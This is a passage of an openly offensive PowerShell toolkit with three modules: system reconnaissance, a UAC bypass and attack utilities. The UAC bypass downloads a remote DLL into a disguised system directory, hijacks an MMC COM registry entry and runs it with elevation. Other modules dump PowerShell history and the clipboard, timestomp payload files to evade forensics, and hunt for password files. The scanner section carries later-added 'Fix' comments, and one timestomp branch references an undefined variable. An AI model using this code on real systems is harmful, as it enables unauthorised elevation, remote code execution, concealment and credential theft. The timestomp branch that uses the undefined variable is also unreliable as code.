###`n" 378 | $h 379 | Write $psversiontable 380 | $h 381 | } 382 | 383 | elseif ($DnsCache) { 384 | $h = "`n### Invoke-Sysinfo(DnsCache) ###`n" 385 | if ($PSVersionTable.PSVersion.Major -eq "2") { 386 | $h 387 | Write " [!] This function requires PowerShell version greater than 2.0." 388 | $h 389 | return 390 | } 391 | else { 392 | $h 393 | Get-DnsClientCache 394 | $h 395 | } 396 | } 397 | elseif ($PsHistory) { 398 | # https://twitter.com/mattifestation/status/740242366754226176 399 | $h = "`n### Invoke-Sysinfo(PsHistory) ###`n" 400 | $h 401 | (Get-Content "$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt") 402 | $h 403 | } 404 | elseif ($ClipBoard) { 405 | $h = "`n### Invoke-Sysinfo(ClipBoard) ###`n" 406 | $h 407 | Get-ClipBoard -Raw 408 | $h 409 | } 410 | elseif ($RecentDocs) { 411 | 412 | (Get-ChildItem $env:appdata\Microsoft\Windows\Recent\) 413 | 414 | } 415 | elseif ($IpConfig) { 416 | (ipconfig /all) 417 | } 418 | elseif ($NetStat) { 419 | (netstat -an) 420 | } 421 | elseif ($IEFavorites) { 422 | 423 | $Favorites = [Environment]::GetFolderPath('Favorites') 424 | $UrlFiles = (Get-ChildItem -Recurse -File $Favorites).FullName 425 | $h = "`n### Invoke-Sysinfo(IEFavorites) ###`n" 426 | $h 427 | foreach ($Url in $UrlFiles) { 428 | $Urlx = Get-Content $Url | Select-String -Pattern "URL" 429 | $Urlx -replace "URL=" 430 | } 431 | Write-Output "`n" 432 | } 433 | elseif ($DumpAll) { 434 | $h = "`n### Invoke-Sysinfo(DumpAll) ###`n" 435 | $h 436 | (Invoke-Sysinfo -Os | out-file $env:temp\sysinfo.txt -Append) 437 | (Invoke-Sysinfo -Env | out-file $env:temp\sysinfo.txt -Append) 438 | (Invoke-Sysinfo -Arch | out-file $env:temp\sysinfo.txt -Append) 439 | (Invoke-Sysinfo -Drives | out-file $env:temp\sysinfo.txt -Append) 440 | (Invoke-Sysinfo -Users | out-file $env:temp\sysinfo.txt -Append) 441 | (Invoke-Sysinfo -LocalAdmins | out-file $env:temp\sysinfo.txt -Append) 442 | (Invoke-Sysinfo -DomainAdmins | out-file $env:temp\sysinfo.txt -Append) 443 | 
(Invoke-Sysinfo -Privs | out-file $env:temp\sysinfo.txt -Append) 444 | (Invoke-Sysinfo -HotFixes | out-file $env:temp\sysinfo.txt -Append) 445 | (Invoke-Sysinfo -CheckElevated | out-file $env:temp\sysinfo.txt -Append) 446 | (Invoke-Sysinfo -Shares | out-file $env:temp\sysinfo.txt -Append) 447 | (Invoke-Sysinfo -LoggedOn | out-file $env:temp\sysinfo.txt -Append) 448 | (Invoke-Sysinfo -Apps | out-file $env:temp\sysinfo.txt -Append) 449 | (Invoke-Sysinfo -Procs | out-file $env:temp\sysinfo.txt -Append) 450 | (Invoke-Sysinfo -Services | out-file $env:temp\sysinfo.txt -Append) 451 | (Invoke-Sysinfo -Tasks | out-file $env:temp\sysinfo.txt -Append) 452 | (Invoke-Sysinfo -Av | out-file $env:temp\sysinfo.txt -Append) 453 | (Invoke-Sysinfo -LangMode | out-file $env:temp\sysinfo.txt -Append) 454 | (Invoke-Sysinfo -PsVersion | out-file $env:temp\sysinfo.txt -Append) 455 | (Invoke-Sysinfo -DnsCache | out-file $env:temp\sysinfo.txt -Append) 456 | (Invoke-Sysinfo -PsHistory | out-file $env:temp\sysinfo.txt -Append) 457 | (Invoke-Sysinfo -ClipBoard | out-file $env:temp\sysinfo.txt -Append) 458 | (Invoke-Sysinfo -RecentDocs | out-file $env:temp\sysinfo.txt -Append) 459 | (Invoke-Sysinfo -IpConfig | out-file $env:temp\sysinfo.txt -Append) 460 | (Invoke-Sysinfo -NetStat | out-file $env:temp\sysinfo.txt -Append) 461 | (Invoke-Sysinfo -IEFavorites | out-file $env:temp\sysinfo.txt -Append) 462 | 463 | Write "All modules dumped to $env:temp\sysinfo.txt" 464 | $h 465 | } 466 | } -------------------------------------------------------------------------------- /modules/Invoke-UACBypass.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-UACBypass { 2 | <# 3 | 4 | .SYNOPSIS 5 | UAC Bypass 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 
12 | 13 | .PARAMETER MMCCom 14 | Downloads a remotely hosted DLL payload and executes a UAC bypass using CLSID 0A29FF9E-7F9C-4437-8B11-F424491E3931 "InProcServer"Event Viewer (mmc.exe) Method. Requires Admin User with UAC set to "Default". (Win 10.0.16299) 15 | 16 | .EXAMPLE 17 | PS> Invoke-UACBypass -MMCCom -RemoteDll https://srv/file.dll 18 | 19 | .NOTES 20 | Author: Fabrizio Siciliano (@0rbz_) 21 | 22 | #> 23 | 24 | [CmdletBinding()] 25 | param ( 26 | [Parameter(Position=1)] 27 | [Switch]$Help, 28 | [switch]$List, 29 | 30 | [Parameter(Mandatory = $False)] 31 | [Switch]$MMCCom, 32 | [String]$RemoteDll 33 | ) 34 | 35 | $Rs1 = (-join ((65..90) + (97..122) | Get-Random -Count 5 | foreach {[char]$_})) 36 | 37 | $DataDirs = @( 38 | ("C:\ProgramData\Intel"), 39 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 40 | ("C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"), 41 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 42 | ("C:\ProgramData\Microsoft\Diagnosis"), 43 | ("C:\ProgramData\Microsoft\Diagnosis\FeedbackHub"), 44 | ("C:\ProgramData\Microsoft\Diagnosis\Scripts"), 45 | ("C:\ProgramData\Microsoft\Network\Downloader"), 46 | ("C:\ProgramData\Microsoft\Office\Heartbeat"), 47 | ("C:\ProgramData\Microsoft\Search\Data"), 48 | ("C:\ProgramData\Microsoft\Search\Data\Applications"), 49 | ("C:\ProgramData\Microsoft\Search\Data\Temp"), 50 | ("C:\ProgramData\Microsoft\Windows\WER\ReportArchive"), 51 | ("C:\ProgramData\Microsoft\Windows\WER\ReportQueue"), 52 | ("C:\ProgramData\Microsoft\Windows\WER\Temp"), 53 | ("C:\ProgramData\WindowsHolographicDevices"), 54 | ("C:\Users\Public\Libraries"), 55 | ("C:\Users\Public\AccountPictures"), 56 | ("C:\Users\Public\Documents"), 57 | ("C:\Users\Public\Downloads"), 58 | ("C:\Users\Public\Music"), 59 | ("C:\Users\Public\Pictures"), 60 | ("C:\Users\Public\Videos"), 61 | ("C:\Users\Public\Roaming"), 62 | ("C:\Windows\debug\WIA"), 63 | ("C:\Windows\ServiceProfiles\LocalService"), 64 | ("C:\Windows\ServiceProfiles\LocalService\AppData"), 65 | 
("C:\Windows\ServiceProfiles\LocalService\AppData\Local"), 66 | ("C:\Windows\ServiceProfiles\LocalService\AppData\LocalLow"), 67 | ("C:\Windows\Temp"), 68 | ("C:\windows\system32\config"), 69 | ("C:\Windows\System32\LogFiles\WMI"), 70 | ("C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys") 71 | ) 72 | 73 | # create a new array from the list above of whose existence is true on the target system. 74 | $NewArray = foreach ($datadir in $datadirs) { 75 | if (Test-Path $datadir) { 76 | @($datadir) 77 | } 78 | } 79 | $datadir = ($newarray[(get-random -Maximum ([array]$newarray).count)]) 80 | 81 | if ($Help -eq $True) { 82 | 83 | Write @" 84 | 85 | ### Invoke-UACBypass Help ### 86 | ----------------------------- 87 | Available Invoke-UACBypass Commands: 88 | ------------------------------------ 89 | |-----------------------------------------------------------------------------| 90 | | -MMCCom [-RemoteDll] remote_dll | 91 | |-----------------------------------------------------------------------------| 92 | 93 | [?] Description: Downloads a remotely hosted DLL payload and executes a UAC 94 | bypass using CLSID 0A29FF9E-7F9C-4437-8B11-F424491E3931 "InProcServer" 95 | Event Viewer (mmc.exe) Method. Requires Admin User with UAC set to 96 | "Default". (Win 10.0.16299) 97 | 98 | [?] Usage: Invoke-UACBypass -MMCCom -RemoteDll https://srv/file.dll 99 | 100 | \-----------------------------------------------------------------------------/ 101 | 102 | "@ 103 | } 104 | elseif ($List -eq $True) { 105 | Write @" 106 | 107 | Invoke-UACBypass Brief Command Usage: 108 | ------------------------------------- 109 | Invoke-UACBypass -MMCCom -RemoteDll https://srv/file.dll 110 | 111 | "@ 112 | } 113 | 114 | elseif ($MMCCom -and $RemoteDll) { 115 | 116 | if ($PSVersionTable.PSVersion.Major -eq "2") { 117 | Write "`n [!] 
This function requires PowerShell version greater than 2.0.`n" 118 | return 119 | } 120 | 121 | # https://twitter.com/UnaPibaGeek/status/1067777096955674625 122 | $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin 123 | 124 | $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop 125 | 126 | if ($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1) { 127 | Write "`n [!] UAC is set to 'Always Notify', Can't bypass with this settings. Requires 'Default' UAC setting.`n" 128 | Return 129 | } 130 | else { 131 | 132 | $ClsidRegPath = "HKCU:\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InProcServer32" 133 | $ValName = "(Default)" 134 | 135 | # download the dll into a random directory and a randomized file name. 136 | 137 | $LocalDll = "$DataDir\$Rs1.dll" 138 | 139 | $dl = New-Object System.Net.WebClient 140 | $dl.headers.add("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5") 141 | $dl.downloadfile("$RemoteDll", "$LocalDll") 142 | 143 | $RegValue = $LocalDll 144 | New-Item -Path $ClsidRegPath -Force | Out-Null 145 | New-ItemProperty -Path $ClsidRegPath -Name $ValName -Value $RegValue | Out-Null 146 | 147 | $Command = "$env:windir\system32\eventvwr.msc /s" 148 | Start-Job -Name "MMCCom" -ScriptBlock {Invoke-Expression $Command} 149 | Stop-Job -Name "MMCCom" 150 | Sleep 4 151 | Remove-Item -Path $ClsidRegPath -Force -ErrorAction SilentlyContinue | Out-Null 152 | } 153 | } 154 | } -------------------------------------------------------------------------------- /modules/Invoke-Utility.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Utility { 2 | <# 3 | 4 | .SYNOPSIS 5 | 6 | Miscellaneous Utilities. 7 | 8 | .PARAMETER Help 9 | 10 | Shows detailed help for each function. 
11 | 12 | .PARAMETER List 13 | 14 | Shows brief command usage list. 15 | 16 | 17 | .PARAMETER TcpScan 18 | 19 | A Simple TCP Port Scanner. 20 | 21 | .PARAMETER TimeStomp 22 | 23 | Modifies a files' Creation Time to that of C:\windows\system32\cmd.exe. The 'TimeOf' parameter can be used to change the timestamp to match that of some other file. 24 | 25 | .PARAMETER FindFile 26 | 27 | Search for a file. 28 | 29 | .EXAMPLE 30 | 31 | Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,3389,22,445 32 | 33 | .EXAMPLE 34 | 35 | (Time Stomps C:\payload.exe to match C:\windows\system32\cmd.exe) 36 | Invoke-Utility -TimeStomp -File C:\payload.exe 37 | 38 | (Time Stomps C:\payload.exe to match C:\Users\user\Documents\foo.doc) 39 | Invoke-Utility -TimeStomp -File C:\payload.exe -TimeOf C:\Users\user\Documents\foo.doc 40 | 41 | 42 | .EXAMPLE 43 | 44 | Invoke-Utility -FindFile -File passwords.doc -Path C:\Users 45 | Invoke-Utility -FindFile -File passwords* -Path C:\Users 46 | 47 | .NOTES 48 | 49 | Author: Fabrizio Siciliano (@0rbz_) 50 | 51 | #> 52 | [CmdletBinding()] 53 | param ( 54 | 55 | [Parameter(Position=1)] 56 | [Switch]$Help, 57 | [Switch]$List, 58 | 59 | [Parameter(Mandatory = $False)] 60 | [Switch]$TcpScan, 61 | [String]$IpAddress, 62 | $Ports, 63 | [Switch]$Force, 64 | 65 | [Parameter(Mandatory = $False)] 66 | [Switch]$TimeStomp, 67 | [String]$File, 68 | [String]$TimeOf, 69 | 70 | [Parameter(Mandatory = $False)] 71 | [Switch]$FindFile, 72 | [string]$File2=[string]$File, 73 | [String]$Path 74 | 75 | ) 76 | 77 | $DataDirs = @( 78 | ("C:\ProgramData\Intel"), 79 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 80 | ("C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"), 81 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 82 | ("C:\ProgramData\Microsoft\Diagnosis"), 83 | ("C:\ProgramData\Microsoft\Diagnosis\FeedbackHub"), 84 | ("C:\ProgramData\Microsoft\Diagnosis\Scripts"), 85 | ("C:\ProgramData\Microsoft\Network\Downloader"), 86 | 
("C:\ProgramData\Microsoft\Office\Heartbeat"), 87 | ("C:\ProgramData\Microsoft\Search\Data"), 88 | ("C:\ProgramData\Microsoft\Search\Data\Applications"), 89 | ("C:\ProgramData\Microsoft\Search\Data\Temp"), 90 | ("C:\ProgramData\WindowsHolographicDevices"), 91 | ("C:\Users\Public\Libraries"), 92 | ("C:\Users\Public\AccountPictures"), 93 | ("C:\Users\Public\Documents"), 94 | ("C:\Users\Public\Downloads"), 95 | ("C:\Users\Public\Music"), 96 | ("C:\Users\Public\Pictures"), 97 | ("C:\Users\Public\Videos"), 98 | ("C:\Users\Public\Roaming"), 99 | ("C:\Windows\debug\WIA"), 100 | ("C:\Windows\ServiceProfiles\LocalService"), 101 | ("C:\Windows\ServiceProfiles\LocalService\AppData"), 102 | ("C:\Windows\ServiceProfiles\LocalService\AppData\Local"), 103 | ("C:\Windows\ServiceProfiles\LocalService\AppData\LocalLow"), 104 | ("C:\Windows\Temp"), 105 | ("C:\windows\system32\config"), 106 | ("C:\Windows\System32\LogFiles\WMI"), 107 | ("C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys") 108 | ) 109 | 110 | $NewArray = foreach ($datadir in $datadirs) { 111 | if (Test-Path $datadir) { 112 | @($datadir) 113 | } 114 | } 115 | $datadir = ($newarray[(get-random -Maximum ([array]$newarray).count)]) 116 | 117 | 118 | 119 | if ($Help) { 120 | Write @" 121 | 122 | ### Invoke-Utility Help ### 123 | -------------------------------- 124 | Available Invoke-Utility Commands: 125 | -------------------------------- 126 | |---------------------------------------------------------------------| 127 | | -TcpScan [-IpAddress] ip_address [-Ports] ports [-Force] | 128 | |---------------------------------------------------------------------| 129 | 130 | [*] Description: Simple TCP Port Scanner. 131 | 132 | [*] Usage: Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,8080 133 | [*] Usage: Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,8080 -Force 134 | (Will attempt to scan the host in the case ICMP echo request is blocked.) 
135 | 136 | [*] Mitre ATT&CK Ref: T1423 (Network Service Scanning) 137 | 138 | |----------------------------------------------------------------------| 139 | | -TimeStomp [-File] file.exe [-TimeOf] someotherfile.exe | 140 | |----------------------------------------------------------------------| 141 | 142 | [*] Description: Modifies a files' Creation Time to that of 143 | C:\windows\system32\cmd.exe. The 'TimeOf' parameter can be used 144 | to change the timestamp to match that of some other file. 145 | 146 | [*] Usage: Invoke-Utility -TimeStomp -File C:\temp\file.exe 147 | [*] Usage: Invoke-Utility -TimeStomp -File C:\temp\file.exe -TimeOf C:\windows\system32\calc.exe 148 | 149 | [*] Mitre ATT&CK Ref: T1099 (Timestomp) 150 | 151 | |----------------------------------------------------------------------| 152 | | -FindFile -File file.txt -Path path | 153 | |----------------------------------------------------------------------| 154 | 155 | [*] Description: Search for a file. 156 | 157 | [*] Usage: Invoke-Utility -FindFile -File passwords.xls -Path C:\Users 158 | 159 | \---------------------------------------------------------------------/ 160 | 161 | "@ 162 | } 163 | elseif ($List) { 164 | Write @" 165 | 166 | Invoke-Utility Brief Command Usage: 167 | ----------------------------------- 168 | Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,8080 169 | Invoke-Utility -TimeStomp -File C:\temp\file.exe 170 | Invoke-Utility -TimeStomp -File C:\temp\file.exe -TimeOf C:\windows\system32\calc.exe 171 | Invoke-Utility -FindFile -File passwords.xls -Path C:\Users 172 | 173 | "@ 174 | } 175 | elseif ($TCPScan -and $IpAddress) { 176 | 177 | if ($PSVersionTable.PSVersion.Major -eq "2") { 178 | Write "`n [!] 
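This function requires PowerShell version greater than 2.0.`n"
    return
}

# -Force skips the ICMP reachability probe, for hosts that drop echo requests.
# (Merged from a second 'elseif ($TCPScan -and $IpAddress -and $Force)' branch
# that could never run: this branch's condition matched first and swallowed
# the -Force case, so the documented behaviour was unreachable.)
if (-not $Force -and -not (Test-Connection -Quiet -Count 1 $IpAddress)) {
    Write "Host appears offline."
    return
}

if (-not $Ports) {
    Write "No ports given (e.g. -Ports 80,443,3389)."
    return
}

# Accept both an array (-Ports 80,443) and a single "80,443" string.
foreach ($Port in @($Ports -split ',')) {
    $Port = $Port.Trim()
    if (-not $Port) { continue }

    $TcpClient = New-Object System.Net.Sockets.TcpClient
    try {
        $Connect = $TcpClient.BeginConnect($IpAddress, [int]$Port, $Null, $Null)

        # Fix: the original waited 5 ms and treated any completion as "Open".
        # The wait handle is also signalled when the connect FAILS (RST), so
        # closed ports on a LAN were reported open, while open ports on a
        # slower link timed out and were missed. Wait up to 1 s, then let
        # EndConnect say whether the handshake actually succeeded (it throws
        # if it did not).
        if ($Connect.AsyncWaitHandle.WaitOne(1000, $False)) {
            $TcpClient.EndConnect($Connect)
            if ($TcpClient.Connected) {
                Write "Open: $Port"
            }
        }
    }
    catch {
        # Refused / unreachable / non-numeric port: not open, nothing printed
        # (the original likewise only reported open ports).
    }
    finally {
        $TcpClient.Close()
    }
    # Keep the original one-second pacing between ports.
    sleep 1
}
}
elseif ($TimeStomp -and $File -and $TimeOf) {

    $TimeSource = (Get-Item $TimeOf).FullName
    [IO.File]::SetCreationTime("$File", [IO.File]::GetCreationTime($TimeSource))
    [IO.File]::SetLastAccessTime("$File", [IO.File]::GetLastAccessTime($TimeSource))
    [IO.File]::SetLastWriteTIme("$File", [IO.File]::GetLastWriteTime($TimeSource))

    Write " `n[+] Changed Creation, Last Access, and Last Write Time for $File`:"
    (Get-Item $File)
}
elseif ($TimeStomp -and $File -and !$TimeOf) {

    [IO.File]::SetCreationTime("$File", [IO.File]::GetCreationTime($TimeSource))
    [IO.File]::SetLastAccessTime("$File",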
[IO.File]::GetLastAccessTime($TimeSource)) 243 | [IO.File]::SetLastWriteTIme("$File", [IO.File]::GetLastWriteTime($TimeSource)) 244 | 245 | Write " `n[+] Changed Creation, Last Access, and Last Write Time for $File`:" 246 | (Get-Item $File) 247 | } 248 | elseif ($FindFile -and $File -and $Path) { 249 | 250 | Get-ChildItem -Path $Path -Filter $File -Recurse -ErrorAction SilentlyContinue -Force 251 | } 252 | } --------------------------------------------------------------------------------